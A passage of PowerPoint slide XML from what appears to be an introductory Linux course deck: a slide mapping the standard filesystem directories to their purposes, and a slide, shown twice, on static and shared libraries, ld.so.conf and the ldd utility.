            <p:cNvPr id="28" name="Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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/lib/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>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/media</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30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>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mnt</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31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>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/opt/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>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sbin</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33" name="Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>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srv</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34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>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tmp</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35" name="Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>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usr</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36" name="Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763265"/>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var</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37" name="Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>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/root/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>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proc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1656360"/>
            <a:ext cx="1728928" cy="2272777"/>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42" name="Straight Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1964851"/>
            <a:ext cx="1728926" cy="1964286"/>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45" name="Straight Connector 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2273340"/>
            <a:ext cx="1728926" cy="1655797"/>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52" name="Straight Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2581830"/>
            <a:ext cx="1728925" cy="1347307"/>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54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2890319"/>
            <a:ext cx="1728926" cy="1038818"/>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56" name="Straight Connector 55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3198810"/>
            <a:ext cx="1728925" cy="730327"/>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58" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="38" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728925" cy="2354571"/>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60" name="Straight Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="2046081"/>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62" name="Straight Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1737592"/>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64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="1429101"/>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66" name="Straight Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728929" cy="195142"/>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68" name="Straight Connector 67"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3815790"/>
            <a:ext cx="1728923" cy="113347"/>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70" name="Straight Connector 69"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3507300"/>
            <a:ext cx="1728925" cy="421837"/>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72" name="Straight Connector 71"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="812122"/>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74" name="Straight Connector 73"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1120612"/>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76" name="Straight Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="503632"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5591626" y="1502115"/>
            <a:ext cx="5108211" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Rectangle 92"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>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Essential user command </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>inaries</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Rectangle 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>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Static files of Boot Loader</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95" name="Rectangle 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>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Device files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96" name="Rectangle 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>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Host-specific system configuration</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97" name="Rectangle 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>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User home directories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98" name="Rectangle 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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Shared libraries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99" name="Rectangle 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>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Mount point for removable</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> media</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0" name="Rectangle 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>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Mount point for file systems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1" name="Rectangle 100"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>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Add-on application software packages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2" name="Rectangle 101"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>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System binaries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3" name="Rectangle 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>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Data for services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4" name="Rectangle 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>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Temp files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5" name="Rectangle 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>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User utilities and applications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6" name="Rectangle 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763266"/>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Variable files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7" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>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Home directory for root user</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8" name="Rectangle 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>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Virtual </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>filesystem</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> for kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 58"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564262" y="4676994"/>
            <a:ext cx="4119738" cy="1865586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;112;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7598137" y="5364479"/>
            <a:ext cx="975359" cy="447041"/>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26634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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Library: An assortment of precompiled code to be reused in a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux supports two classes of libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static libraries – bound to a program statically at compile time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic or shared libraries – loaded when a program is launched / loaded in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically linked libraries – program linked with shared library and Kernel loads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically loaded libraries – program takes full control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hold basic directories to find library files [Shared Object (.so) files]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld.so.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld.so.conf.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Show libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ldd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Shared Libraries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5750" y="4849946"/>
            <a:ext cx="8010525" cy="1680121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2912653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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Library: An assortment of precompiled code to be reused in a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux supports two classes of libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static libraries – bound to a program statically at compile time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic or shared libraries – loaded when a program is launched / loaded in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically linked libraries – program linked with shared library and Kernel loads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically loaded libraries – program takes full control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hold basic directories to find library files [Shared Object (.so) files]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld.so.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld.so.conf.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Show libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ldd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Shared Libraries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5750" y="4849946"/>
            <a:ext cx="8010525" cy="1680121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3466952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564262" y="4600794"/>
            <a:ext cx="4119738" cy="1865586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
